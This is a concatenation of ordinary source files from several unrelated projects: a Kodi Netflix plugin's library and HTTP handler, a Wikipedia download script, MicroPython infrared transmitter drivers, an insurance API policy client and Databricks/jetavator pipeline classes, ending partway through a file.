return show_meta in self.db[self.series_label]
def season_exists (self, title, season):
"""Checks if a season is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
Returns
-------
bool
Season of show exists in DB
"""
if self.show_exists(title) == False:
return False
show_entry = self.db[self.series_label][title]
return season in show_entry['seasons']
def episode_exists (self, title, season, episode):
"""Checks if an episode if a show is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
episode : :obj:`int`
Episode sequence number
Returns
-------
bool
Episode of show exists in DB
"""
if self.show_exists(title) == False:
return False
show_entry = self.db[self.series_label][title]
episode_entry = 'S%02dE%02d' % (season, episode)
return episode_entry in show_entry['episodes']
def add_movie (self, title, alt_title, year, video_id, build_url):
"""Adds a movie to the local db, generates & persists the strm file
Parameters
----------
title : :obj:`str`
Title of the show
alt_title : :obj:`str`
Alternative title given by the user
year : :obj:`int`
Release year of the show
video_id : :obj:`str`
ID of the video to be played
build_url : :obj:`fn`
Function to generate the stream url
"""
movie_meta = '%s (%d)' % (title, year)
folder = alt_title
dirname = os.path.join(self.movie_path, folder)
filename = os.path.join(dirname, movie_meta + '.strm')
if os.path.exists(filename):
return
if not os.path.exists(dirname):
os.makedirs(dirname)
if self.movie_exists(title=title, year=year) == False:
self.db[self.movies_label][movie_meta] = {'alt_title': alt_title}
self._update_local_db(filename=self.db_filepath, db=self.db)
self.write_strm_file(path=filename, url=build_url({'action': 'play_video', 'video_id': video_id}))
def add_show (self, title, alt_title, episodes, build_url):
"""Adds a show to the local db, generates & persists the strm files
        Note: Can also be used to store complete seasons or single episodes; it all depends on
what is present in the episodes dictionary
Parameters
----------
title : :obj:`str`
Title of the show
alt_title : :obj:`str`
Alternative title given by the user
episodes : :obj:`dict` of :obj:`dict`
Episodes that need to be added
build_url : :obj:`fn`
Function to generate the stream url
"""
show_meta = '%s' % (title)
folder = alt_title
show_dir = os.path.join(self.tvshow_path, folder)
if not os.path.exists(show_dir):
os.makedirs(show_dir)
if self.show_exists(title) == False:
self.db[self.series_label][show_meta] = {'seasons': [], 'episodes': [], 'alt_title': alt_title}
for episode in episodes:
self._add_episode(show_dir=show_dir, title=title, season=episode['season'], episode=episode['episode'], video_id=episode['id'], build_url=build_url)
self._update_local_db(filename=self.db_filepath, db=self.db)
return show_dir
def _add_episode (self, title, show_dir, season, episode, video_id, build_url):
"""Adds a single episode to the local DB, generates & persists the strm file
Parameters
----------
title : :obj:`str`
Title of the show
show_dir : :obj:`str`
Directory that holds the stream files for that show
season : :obj:`int`
Season sequence number
episode : :obj:`int`
Episode sequence number
video_id : :obj:`str`
ID of the video to be played
build_url : :obj:`fn`
Function to generate the stream url
"""
season = int(season)
episode = int(episode)
# add season
if self.season_exists(title=title, season=season) == False:
self.db[self.series_label][title]['seasons'].append(season)
# add episode
episode_meta = 'S%02dE%02d' % (season, episode)
if self.episode_exists(title=title, season=season, episode=episode) == False:
self.db[self.series_label][title]['episodes'].append(episode_meta)
# create strm file
filename = episode_meta + '.strm'
filepath = os.path.join(show_dir, filename)
if os.path.exists(filepath):
return
self.write_strm_file(path=filepath, url=build_url({'action': 'play_video', 'video_id': video_id}))
def remove_movie (self, title, year):
"""Removes the DB entry & the strm file for the movie given
Parameters
----------
title : :obj:`str`
Title of the movie
year : :obj:`int`
Release year of the movie
Returns
-------
bool
            Delete successful
"""
movie_meta = '%s (%d)' % (title, year)
folder = self.db[self.movies_label][movie_meta]['alt_title']
del self.db[self.movies_label][movie_meta]
self._update_local_db(filename=self.db_filepath, db=self.db)
dirname = os.path.join(self.movie_path, folder)
if os.path.exists(dirname):
rmtree(dirname)
return True
return False
def remove_show (self, title):
"""Removes the DB entry & the strm files for the show given
Parameters
----------
title : :obj:`str`
Title of the show
Returns
-------
bool
            Delete successful
"""
folder = self.db[self.series_label][title]['alt_title']
del self.db[self.series_label][title]
self._update_local_db(filename=self.db_filepath, db=self.db)
show_dir = os.path.join(self.tvshow_path, folder)
if os.path.exists(show_dir):
rmtree(show_dir)
return True
return False
def remove_season (self, title, season):
"""Removes the DB entry & the strm files for a season of a show given
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
Returns
-------
bool
            Delete successful
"""
season = int(season)
season_list = []
episodes_list = []
show_meta = '%s' % (title)
for season_entry in self.db[self.series_label][show_meta]['seasons']:
if season_entry != season:
season_list.append(season_entry)
self.db[self.series_label][show_meta]['seasons'] = season_list
show_dir = os.path.join(self.tvshow_path, self.db[self.series_label][show_meta]['alt_title'])
if os.path.exists(show_dir):
show_files = [f for f in os.listdir(show_dir) if os.path.isfile(os.path.join(show_dir, f))]
for filename in show_files:
if 'S%02dE' % (season) in filename:
os.remove(os.path.join(show_dir, filename))
else:
episodes_list.append(filename.replace('.strm', ''))
self.db[self.series_label][show_meta]['episodes'] = episodes_list
self._update_local_db(filename=self.db_filepath, db=self.db)
return True
def remove_episode (self, title, season, episode):
"""Removes the DB entry & the strm files for an episode of a show given
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
episode : :obj:`int`
Episode sequence number
Returns
-------
bool
            Delete successful
"""
episodes_list = []
show_meta = '%s' % (title)
episode_meta = 'S%02dE%02d' % (season, episode)
show_dir = os.path.join(self.tvshow_path, self.db[self.series_label][show_meta]['alt_title'])
if os.path.exists(os.path.join(show_dir, episode_meta + '.strm')):
os.remove(os.path.join(show_dir, episode_meta + '.strm'))
for episode_entry in self.db[self.series_label][show_meta]['episodes']:
if episode_meta != episode_entry:
episodes_list.append(episode_entry)
self.db[self.series_label][show_meta]['episodes'] = episodes_list
self._update_local_db(filename=self.db_filepath, db=self.db)
return True
```
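A rough usage sketch: the folder, settings values, movie metadata, and URL builder below are all invented and only show the expected argument shapes.
```python
# Hypothetical usage; paths, settings, metadata and the URL builder are invented.
def build_url(query):
    return "plugin://plugin.video.netflix/?" + "&".join(
        "%s=%s" % (k, v) for k, v in query.items())

library = Library(
    root_folder="/tmp/netflix_lib",
    library_settings={"enablelibraryfolder": "false", "customlibraryfolder": ""})
library.add_movie(title="Example Movie", alt_title="Example Movie",
                  year=2017, video_id="80000000", build_url=build_url)
```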
#### File: resources/lib/NetflixHttpSubRessourceHandler.py
```python
class NetflixHttpSubRessourceHandler:
""" Represents the callable internal server routes & translates/executes them to requests for Netflix"""
def __init__ (self, kodi_helper, netflix_session):
"""Sets up credentials & video_list_cache cache
Assigns the netflix_session/kodi_helper instacnes
Does the initial login if we have user data
Parameters
----------
kodi_helper : :obj:`KodiHelper`
instance of the KodiHelper class
netflix_session : :obj:`NetflixSession`
instance of the NetflixSession class
"""
self.kodi_helper = kodi_helper
self.netflix_session = netflix_session
self.credentials = self.kodi_helper.get_credentials()
self.profiles = []
self.video_list_cache = {}
self.prefetch_login()
def prefetch_login (self):
"""Check if we have stored credentials.
If so, do the login before the user requests it
If that is done, we cache the profiles
"""
if self.credentials['email'] != '' and self.credentials['password'] != '':
if self.netflix_session.is_logged_in(account=self.credentials):
self.netflix_session.refresh_session_data(account=self.credentials)
self.profiles = self.netflix_session.profiles
else:
self.netflix_session.login(account=self.credentials)
self.profiles = self.netflix_session.profiles
else:
self.profiles = []
self.kodi_helper.set_esn(self.netflix_session.esn)
def is_logged_in (self, params):
"""Existing login proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
if self.credentials['email'] == '' or self.credentials['password'] == '':
return False
return self.netflix_session.is_logged_in(account=self.credentials)
def logout (self, params):
"""Logout proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
self.profiles = []
self.credentials = {'email': '', 'password': ''}
# delete esn data
self.kodi_helper.delete_manifest_data()
return self.netflix_session.logout()
def login (self, params):
"""Logout proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
email = params.get('email', [''])[0]
password = params.get('password', [''])[0]
if email != '' and password != '':
self.credentials = {'email': email, 'password': password}
_ret = self.netflix_session.login(account=self.credentials)
self.profiles = self.netflix_session.profiles
return _ret
return None
def list_profiles (self, params):
"""Returns the cached list of profiles
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`dict` of :obj:`str`
List of profiles
"""
return self.profiles
def get_esn (self, params):
"""ESN getter function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`str`
            Extracted ESN
"""
return self.netflix_session.esn
def fetch_video_list_ids (self, params):
"""Video list ids proxy function (caches video lists)
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`list`
Transformed response of the remote call
"""
cached_list = self.video_list_cache.get(self.netflix_session.user_data['guid'], None)
if cached_list != None:
self.kodi_helper.log('Serving cached list for user: ' + self.netflix_session.user_data['guid'])
return cached_list
video_list_ids_raw = self.netflix_session.fetch_video_list_ids()
if 'error' in video_list_ids_raw:
return video_list_ids_raw
return self.netflix_session.parse_video_list_ids(response_data=video_list_ids_raw)
def fetch_video_list (self, params):
"""Video list proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`list`
Transformed response of the remote call
"""
list_id = params.get('list_id', [''])[0]
raw_video_list = self.netflix_session.fetch_video_list(list_id=list_id)
if 'error' in raw_video_list:
return raw_video_list
# parse the video list ids
if 'videos' in raw_video_list.get('value', {}).keys():
return self.netflix_session.parse_video_list(response_data=raw_video_list)
return []
def fetch_episodes_by_season (self, params):
"""Episodes for season proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`list`
Transformed response of the remote call
"""
raw_episode_list = self.netflix_session.fetch_episodes_by_season(season_id=params.get('season_id')[0])
if 'error' in raw_episode_list:
return raw_episode_list
return self.netflix_session.parse_episodes_by_season(response_data=raw_episode_list)
def fetch_seasons_for_show (self, params):
"""Season for show proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`list`
Transformed response of the remote call
"""
show_id = params.get('show_id', [''])[0]
raw_season_list = self.netflix_session.fetch_seasons_for_show(id=show_id)
if 'error' in raw_season_list:
return raw_season_list
        # check if we have seasons; announced shows that are not yet available have none
if 'seasons' not in raw_season_list.get('value', {}):
return []
return self.netflix_session.parse_seasons(id=show_id, response_data=raw_season_list)
def rate_video (self, params):
"""Video rating proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
video_id = params.get('video_id', [''])[0]
rating = params.get('rating', [''])[0]
return self.netflix_session.rate_video(video_id=video_id, rating=rating)
def remove_from_list (self, params):
"""Remove from my list proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
video_id = params.get('video_id', [''])[0]
return self.netflix_session.remove_from_list(video_id=video_id)
def add_to_list (self, params):
"""Add to my list proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
video_id = params.get('video_id', [''])[0]
return self.netflix_session.add_to_list(video_id=video_id)
def fetch_metadata (self, params):
"""Metadata proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
video_id = params.get('video_id', [''])[0]
return self.netflix_session.fetch_metadata(id=video_id)
def switch_profile (self, params):
"""Switch profile proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`Requests.Response`
Response of the remote call
"""
profile_id = params.get('profile_id', [''])[0]
return self.netflix_session.switch_profile(profile_id=profile_id, account=self.credentials)
def get_user_data (self, params):
"""User data getter function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`str`
            Extracted User Data
"""
return self.netflix_session.user_data
def search (self, params):
"""Search proxy function
Parameters
----------
params : :obj:`dict` of :obj:`str`
Request params
Returns
-------
:obj:`list`
Transformed response of the remote call
"""
term = params.get('term', [''])[0]
has_search_results = False
raw_search_results = self.netflix_session.fetch_search_results(search_str=term)
# check for any errors
if 'error' in raw_search_results:
return raw_search_results
# determine if we found something
if 'search' in raw_search_results['value']:
for key in raw_search_results['value']['search'].keys():
if self.netflix_session._is_size_key(key=key) == False:
has_search_results = raw_search_results['value']['search'][key]['titles']['length'] > 0
if has_search_results == False:
if raw_search_results['value']['search'][key].get('suggestions', False) != False:
for entry in raw_search_results['value']['search'][key]['suggestions']:
if self.netflix_session._is_size_key(key=entry) == False:
if raw_search_results['value']['search'][key]['suggestions'][entry]['relatedvideos']['length'] > 0:
has_search_results = True
# display that we haven't found a thing
if has_search_results == False:
return []
# list the search results
search_results = self.netflix_session.parse_search_results(response_data=raw_search_results)
        # add more meaningful data to the search results
raw_search_contents = self.netflix_session.fetch_video_list_information(video_ids=search_results.keys())
# check for any errors
if 'error' in raw_search_contents:
return raw_search_contents
return self.netflix_session.parse_video_list(response_data=raw_search_contents)
```
|
{
"source": "Jetafull/bert-japanese",
"score": 2
}
|
#### File: bert-japanese/src/data-download-and-extract.py
```python
import configparser
import os
import subprocess
import sys
from urllib.request import urlretrieve
from pathlib import Path
CURDIR = Path(__file__).parent.parent.absolute()
WORKDIR = CURDIR.parent
CONFIGPATH = CURDIR / "config.ini"
config = configparser.ConfigParser()
config.read(CONFIGPATH)
FILEURL = config['DATA']['FILEURL']
FILEPATH = WORKDIR.joinpath(config['DATA']['FILEPATH']).as_posix()
EXTRACTDIR = WORKDIR.joinpath(config['DATA']['TEXTDIR']).as_posix()
def reporthook(blocknum, blocksize, totalsize):
'''
Callback function to show progress of file downloading.
'''
readsofar = blocknum * blocksize
if totalsize > 0:
percent = readsofar * 1e2 / totalsize
s = "\r%5.1f%% %*d / %d" % (
percent, len(str(totalsize)), readsofar, totalsize)
sys.stderr.write(s)
if readsofar >= totalsize: # near the end
sys.stderr.write("\n")
else: # total size is unknown
sys.stderr.write("read %d\n" % (readsofar,))
def download():
urlretrieve(FILEURL, FILEPATH, reporthook)
def extract():
subprocess.call(['python3',
WORKDIR.joinpath('wikiextractor', 'WikiExtractor.py').as_posix(),
FILEPATH, "-o={}".format(EXTRACTDIR)])
def main():
download()
extract()
if __name__ == "__main__":
main()
```
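For reference, a sketch of the `config.ini` the script expects, written with `configparser` so the section and keys match the ones read above. The URL and paths are illustrative assumptions, not values taken from the repository.
```python
import configparser

# Hypothetical sketch: write a config.ini with the [DATA] keys the script reads.
# FILEURL, FILEPATH and TEXTDIR values below are placeholders.
config = configparser.ConfigParser()
config['DATA'] = {
    'FILEURL': 'https://dumps.wikimedia.org/jawiki/latest/jawiki-latest-pages-articles.xml.bz2',
    'FILEPATH': 'data/jawiki-latest-pages-articles.xml.bz2',
    'TEXTDIR': 'data/text',
}
with open('config.ini', 'w') as f:
    config.write(f)
```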
|
{
"source": "jetannenbaum/micropython_ir",
"score": 3
}
|
#### File: micropython_ir/ir_tx/mce.py
```python
from micropython import const
from ir_tx import IR
_TBIT = const(500) # Time (μs) for pulse of carrier
class MCE(IR):
valid = (0xf, 0x3f, 3) # Max addr, data, toggle
init_cs = 4 # http://www.hifi-remote.com/johnsfine/DecodeIR.html#OrtekMCE says 3
def __init__(self, pin, freq=38000, verbose=False):
super().__init__(pin, freq, 34, 30, verbose)
def tx(self, addr, data, toggle):
def checksum(v):
cs = self.init_cs
for _ in range(12):
if v & 1:
cs += 1
v >>= 1
return cs
self.append(2000, 1000, _TBIT)
d = ((data & 0x3f) << 6) | (addr & 0xf) | ((toggle & 3) << 4)
d |= checksum(d) << 12
self.verbose and print(bin(d))
mask = 1
while mask < 0x10000:
bit = bool(d & mask)
if bit ^ self.carrier:
self.add(_TBIT)
self.append(_TBIT)
else:
self.append(_TBIT, _TBIT)
mask <<= 1
```
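A short usage sketch for the MCE transmitter. The pin number and key codes are assumptions; `transmit()` is inherited from the `IR` base class and is the same entry point exercised by `ir_tx/test.py` further down.
```python
# Hypothetical usage sketch (MicroPython) -- pin wiring and codes are placeholders.
from machine import Pin
from ir_tx.mce import MCE

ir = MCE(Pin(23, Pin.OUT, value=0))   # 38 kHz carrier by default
ir.transmit(0x1, 0x7, 0)              # addr <= 0xf, data <= 0x3f, toggle <= 3 (see MCE.valid)
```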
#### File: micropython_ir/ir_tx/philips.py
```python
from micropython import const
from ir_tx import IR
# Philips RC5 protocol
_T_RC5 = const(889) # Time for pulse of carrier
class RC5(IR):
valid = (0x1f, 0x3f, 1) # Max addr, data, toggle
def __init__(self, pin, freq=36000, verbose=False):
super().__init__(pin, freq, 28, 30, verbose)
def tx(self, addr, data, toggle): # Fix RC5X S2 bit polarity
d = (data & 0x3f) | ((addr & 0x1f) << 6) | (((data & 0x40) ^ 0x40) << 6) | ((toggle & 1) << 11)
self.verbose and print(bin(d))
mask = 0x2000
while mask:
if mask == 0x2000:
self.append(_T_RC5)
else:
bit = bool(d & mask)
if bit ^ self.carrier:
self.add(_T_RC5)
self.append(_T_RC5)
else:
self.append(_T_RC5, _T_RC5)
mask >>= 1
# Philips RC6 mode 0 protocol
_T_RC6 = const(444)
_T2_RC6 = const(889)
class RC6_M0(IR):
valid = (0xff, 0xff, 1) # Max addr, data, toggle
def __init__(self, pin, freq=36000, verbose=False):
super().__init__(pin, freq, 44, 30, verbose)
def tx(self, addr, data, toggle):
# leader, 1, 0, 0, 0
self.append(2666, _T2_RC6, _T_RC6, _T2_RC6, _T_RC6, _T_RC6, _T_RC6, _T_RC6, _T_RC6)
# Append a single bit of twice duration
if toggle:
self.add(_T2_RC6)
self.append(_T2_RC6)
else:
self.append(_T2_RC6, _T2_RC6)
d = (data & 0xff) | ((addr & 0xff) << 8)
mask = 0x8000
self.verbose and print('toggle', toggle, self.carrier, bool(d & mask))
while mask:
bit = bool(d & mask)
if bit ^ self.carrier:
self.append(_T_RC6, _T_RC6)
else:
self.add(_T_RC6)
self.append(_T_RC6)
mask >>= 1
```
#### File: micropython_ir/ir_tx/sony.py
```python
from micropython import const
from ir_tx import IR
class SONY_ABC(IR):
def __init__(self, pin, bits, freq, verbose):
super().__init__(pin, freq, 3 + bits * 2, 30, verbose)
if bits not in (12, 15, 20):
raise ValueError('bits must be 12, 15 or 20.')
self.bits = bits
def tx(self, addr, data, ext):
self.append(2400, 600)
bits = self.bits
v = data & 0x7f
if bits == 12:
v |= (addr & 0x1f) << 7
elif bits == 15:
v |= (addr & 0xff) << 7
else:
v |= (addr & 0x1f) << 7
v |= (ext & 0xff) << 12
for _ in range(bits):
self.append(1200 if v & 1 else 600, 600)
v >>= 1
# Sony specifies 40KHz
class SONY_12(SONY_ABC):
valid = (0x1f, 0x7f, 0) # Max addr, data, toggle
def __init__(self, pin, freq=40000, verbose=False):
super().__init__(pin, 12, freq, verbose)
class SONY_15(SONY_ABC):
valid = (0xff, 0x7f, 0) # Max addr, data, toggle
def __init__(self, pin, freq=40000, verbose=False):
super().__init__(pin, 15, freq, verbose)
class SONY_20(SONY_ABC):
valid = (0x1f, 0x7f, 0xff) # Max addr, data, toggle
def __init__(self, pin, freq=40000, verbose=False):
super().__init__(pin, 20, freq, verbose)
```
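Similarly, a hedged sketch for the 20-bit Sony SIRC variant; the third argument carries the extended byte, within the limits given by `SONY_20.valid`, and `transmit()` is again inherited from the `IR` base class.
```python
# Hypothetical usage sketch (MicroPython) -- pin wiring and codes are placeholders.
from machine import Pin
from ir_tx.sony import SONY_20

ir = SONY_20(Pin(17, Pin.OUT, value=0))   # 40 kHz carrier by default
ir.transmit(0x1, 0x7, 0x10)               # addr <= 0x1f, data <= 0x7f, ext <= 0xff
```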
#### File: micropython_ir/ir_tx/test.py
```python
from sys import platform
ESP32 = platform == 'esp32'
RP2 = platform == 'rp2'
PYBOARD = platform == 'pyboard'
if ESP32 or RP2:
from machine import Pin
else:
from pyb import Pin, LED
import uasyncio as asyncio
from primitives.switch import Switch
from primitives.delay_ms import Delay_ms
# Import all implemented classes
from ir_tx.nec import NEC
from ir_tx.sony import SONY_12, SONY_15, SONY_20
from ir_tx.philips import RC5, RC6_M0
loop = asyncio.get_event_loop()
# If button is held down normal behaviour is to retransmit
# but most NEC models send a REPEAT code
class Rbutton:
toggle = 1 # toggle is ignored in NEC mode
def __init__(self, irb, pin, addr, data, proto):
self.irb = irb
self.sw = Switch(pin)
self.addr = addr
self.data = data
self.proto = proto
self.sw.close_func(self.cfunc)
self.sw.open_func(self.ofunc)
self.tim = Delay_ms(self.repeat)
def cfunc(self): # Button push: send data
tog = 0 if self.proto < 3 else Rbutton.toggle # NEC, sony 12, 15: toggle==0
self.irb.transmit(self.addr, self.data, tog, True) # Test validation
# Auto repeat. The Sony protocol specifies 45ms but this is tight.
        # In 20 bit mode a data burst can be up to 39ms long.
self.tim.trigger(108)
def ofunc(self): # Button release: cancel repeat timer
self.tim.stop()
Rbutton.toggle ^= 1 # Toggle control
async def repeat(self):
await asyncio.sleep(0) # Let timer stop before retriggering
if not self.sw(): # Button is still pressed: retrigger
self.tim.trigger(108)
if self.proto == 0:
self.irb.repeat() # NEC special case: send REPEAT code
else:
tog = 0 if self.proto < 3 else Rbutton.toggle # NEC, sony 12, 15: toggle==0
self.irb.transmit(self.addr, self.data, tog, True) # Test validation
async def main(proto):
# Test uses a 38KHz carrier.
if ESP32: # Pins for IR LED gate
pin = Pin(23, Pin.OUT, value = 0)
elif RP2:
pin = Pin(17, Pin.OUT, value = 0)
else:
pin = Pin('X1')
classes = (NEC, SONY_12, SONY_15, SONY_20, RC5, RC6_M0)
irb = classes[proto](pin, 38000) # My decoder chip is 38KHz
# Uncomment the following to print transmit timing
# irb.timeit = True
b = [] # Rbutton instances
px3 = Pin('X3', Pin.IN, Pin.PULL_UP) if PYBOARD else Pin(18, Pin.IN, Pin.PULL_UP)
px4 = Pin('X4', Pin.IN, Pin.PULL_UP) if PYBOARD else Pin(19, Pin.IN, Pin.PULL_UP)
b.append(Rbutton(irb, px3, 0x1, 0x7, proto))
b.append(Rbutton(irb, px4, 0x10, 0xb, proto))
if ESP32:
while True:
print('Running')
await asyncio.sleep(5)
elif RP2:
led = Pin(25, Pin.OUT)
while True:
await asyncio.sleep_ms(500) # Obligatory flashing LED.
led(not led())
else:
led = LED(1)
while True:
await asyncio.sleep_ms(500) # Obligatory flashing LED.
led.toggle()
# Greeting strings. Common:
s = '''Test for IR transmitter. Run:
from ir_tx.test import test
test() for NEC protocol
test(1) for Sony SIRC 12 bit
test(2) for Sony SIRC 15 bit
test(3) for Sony SIRC 20 bit
test(4) for Philips RC-5 protocol
test(5) for Philips RC-6 mode 0.
'''
# Pyboard:
spb = '''
IR LED on pin X1
Ground pin X3 to send addr 1 data 7
Ground pin X4 to send addr 0x10 data 0x0b.'''
# ESP32
sesp = '''
IR LED gate on pin 23
Ground pin 18 to send addr 1 data 7
Ground pin 19 to send addr 0x10 data 0x0b.'''
# RP2
srp2 = '''
IR LED gate on pin 17
Ground pin 18 to send addr 1 data 7
Ground pin 19 to send addr 0x10 data 0x0b.'''
if ESP32:
print(''.join((s, sesp)))
elif RP2:
print(''.join((s, srp2)))
else:
print(''.join((s, spb)))
def test(proto=0):
loop.run_until_complete(main(proto))
```
|
{
"source": "jetarin-min/acrosure-py-sdk",
"score": 3
}
|
#### File: acrosure-py-sdk/acrosure_sdk/policy.py
```python
class PolicyManager:
"""
    Represents a PolicyManager. (You most likely shouldn't be accessing this directly, use {@link AcrosureClient#policy} instead.)
"""
def __init__( self, id, call_api ):
"""
Parameters
----------
id: str
A policy id.
call_api : function
A function which call Acrosure API.
"""
self.id = id
self.call_api = call_api
def set_id( self, id ):
"""
Set current policy id.
Parameters
----------
id : str
A policy id.
"""
self.id = id
def get( self, id = None ):
"""
        Get policy with a specified id or with the current id.
Parameters
----------
id : str, optional
A policy id.
Returns
-------
dict
Policy.
"""
try:
if id:
self.id = id
# resp = self.call_api("/policies/get", {
resp = self.call_api("/success", {
"policy_id": self.id
})
return resp
except Exception as err:
raise err
def list( self, query ):
"""
        Get the list of policies, with or without a query.
Parameters
----------
query : dict
Query object (See Acrosure API document for more detail).
Returns
-------
list
Policies.
"""
try:
resp = self.call_api("/policies/list", query)
return resp
except Exception as err:
raise err
```
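A minimal sketch of using `PolicyManager` directly. The `call_api` stub below is an assumption standing in for the function that `AcrosureClient` normally injects; as the docstring notes, going through `AcrosureClient#policy` is the intended route.
```python
# Hypothetical usage sketch -- the call_api stub is a placeholder, not the real SDK transport.
def call_api(path, payload):
    print('POST', path, payload)
    return {'status': 200, 'data': {}}

manager = PolicyManager(id=None, call_api=call_api)
policy = manager.get('<policy_id>')            # sets and uses the given policy id
policies = manager.list({'status': 'active'})  # query keys are illustrative only
```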
|
{
"source": "jetavator/jetavator_databricks",
"score": 2
}
|
#### File: jetavator_databricks_client/jetavator_databricks_client/LogListener.py
```python
from azure.core.exceptions import ResourceNotFoundError
from lazy_property import LazyProperty
MESSAGE_BATCH_SIZE = 32
class LogListener(object):
def __init__(self, config, storage_service):
self.config = config
self.storage_service = storage_service
print(
'Listening for log events for run_uuid '
f'[{self.config.session.run_uuid}]',
flush=True
)
def __iter__(self):
while True:
messages = list(
self.queue.receive_messages(
messages_per_page=MESSAGE_BATCH_SIZE
)
if self.queue_exists
else []
)
if not messages:
break
for message in messages:
yield message.content
self.queue.delete_message(message)
@property
def queue_name(self):
return f'jetavator-log-{self.config.session.run_uuid}'
@LazyProperty
def queue(self):
return self.storage_service.queue_client(self.queue_name)
@property
def queue_exists(self):
try:
self.queue.get_queue_properties()
return True
except ResourceNotFoundError:
return False
def delete_queue(self):
self.queue.delete_queue()
```
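A short usage sketch: the listener is simply iterated to drain queued log messages for the current run, then the queue is removed. The `config` and `storage_service` objects are assumed to come from the surrounding jetavator client.
```python
# Hypothetical usage sketch -- config and storage_service are assumed to exist.
listener = LogListener(config, storage_service)
for message in listener:      # yields message contents and deletes them from the queue
    print(message)
listener.delete_queue()       # tidy up once the run has finished
```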
#### File: jetavator_databricks_local/services/LocalDatabricksService.py
```python
import os
from jetavator.services import SparkService
from lazy_property import LazyProperty
from pyspark.sql import SparkSession
SPARK_APP_NAME = 'jetavator'
class LocalDatabricksService(SparkService, register_as="local_databricks"):
@property
def logger_config(self):
return {
'version': 1,
'formatters': {
'verbose': {
'format': '%(asctime)s %(levelname)s %(hostname)s %(process)d %(message)s',
},
},
'handlers': {
'queue': {
'service': self.owner.logs_storage_service,
'protocol': 'https',
'queue': f'jetavator-log-{self.owner.config.session.run_uuid}',
'level': 'DEBUG',
'class': 'jetavator_databricks_local.logging.azure_queue_logging.AzureQueueHandler',
'formatter': 'verbose',
},
},
'loggers': {
'jetavator': {
'handlers': ['queue'],
'level': 'DEBUG',
},
}
}
@property
def azure_storage_key(self):
return self.owner.source_storage_service.config.account_key
@property
def azure_storage_container(self):
return self.owner.source_storage_service.config.blob_container_name
@property
def azure_storage_location(self):
return (
f'{self.owner.source_storage_service.config.account_name}.'
'blob.core.windows.net'
)
@LazyProperty
def dbutils(self):
import IPython
return IPython.get_ipython().user_ns["dbutils"]
@property
def spark(self):
spark_session = (
SparkSession
.builder
.appName(SPARK_APP_NAME)
.enableHiveSupport()
.getOrCreate()
)
storage_key_name = f'fs.azure.account.key.{self.azure_storage_location}'
mount_point = f'/mnt/{self.azure_storage_container}'
if not os.path.exists(f'/dbfs/{mount_point}'):
self.owner.source_storage_service.create_container_if_not_exists()
self.dbutils.fs.mount(
source=(
f'wasbs://{self.azure_storage_container}@'
f'{self.azure_storage_location}'
),
mount_point=mount_point,
extra_configs={
storage_key_name: self.azure_storage_key
}
)
return spark_session
def csv_file_path(self, source_name: str):
return (
f'/mnt/{self.azure_storage_container}/'
f'{self.config.schema}/'
f'{self.owner.config.session.run_uuid}/'
f'{source_name}.csv'
)
def source_csv_exists(self, source_name: str):
return os.path.exists('/dbfs/' + self.csv_file_path(source_name))
def load_csv(self, csv_file, source_name: str):
# TODO: Either implement this or remove if from the superclass interface
raise NotImplementedError()
```
|
{
"source": "jetavator/jetavator",
"score": 3
}
|
#### File: runners/jobs/DropSource.py
```python
from abc import ABC
from typing import List
from jetavator.schema_registry import Source
from .. import Job, Runner
class DropSource(Job, ABC, register_as='drop_source'):
"""
Drop the temporary table for a source CSV file.
:param runner: The `Runner` that created this object.
:param source: The `Source` object containing the source definitions.
"""
def __init__(self, runner: Runner, source: Source) -> None:
super().__init__(runner, source)
self.source = source
@property
def name(self) -> str:
return f'drop_source_{self.source.name}'
@property
def dependencies(self) -> List[Job]:
return [
self.runner.get_job('satellite_query', satellite)
for satellite in self.source.dependent_satellites
]
@property
def csv_path(self) -> str:
"""
:return: Returns the path to the supplied `Source` CSV file.
"""
return self.runner.compute_service.csv_file_path(self.source.name)
```
#### File: runners/jobs/SatelliteOwnerKeys.py
```python
from abc import ABC
from typing import List
from jetavator.schema_registry import SatelliteOwner
from .. import Job, Runner
class SatelliteOwnerKeys(Job, ABC, register_as='satellite_owner_keys'):
"""
Collects all the key values for any `Satellite` row that has been created,
updated or deleted for this particular `Hub` or `Link`.
:param runner: The `Runner` that created this object.
:param satellite_owner: The `Hub` or `Link` object that is being used to create
a Dimension or Fact table, respectively.
"""
def __init__(
self,
runner: Runner,
satellite_owner: SatelliteOwner
) -> None:
super().__init__(runner, satellite_owner)
self.satellite_owner = satellite_owner
@property
def name(self) -> str:
return f'keys_{self.satellite_owner.full_name}'
@property
def dependencies(self) -> List[Job]:
return [
self.runner.get_job('output_keys', satellite, self.satellite_owner)
for satellite
in self.satellite_owner.satellites_containing_keys.values()
]
```
#### File: runners/jobs/StarData.py
```python
from abc import ABC
from typing import List
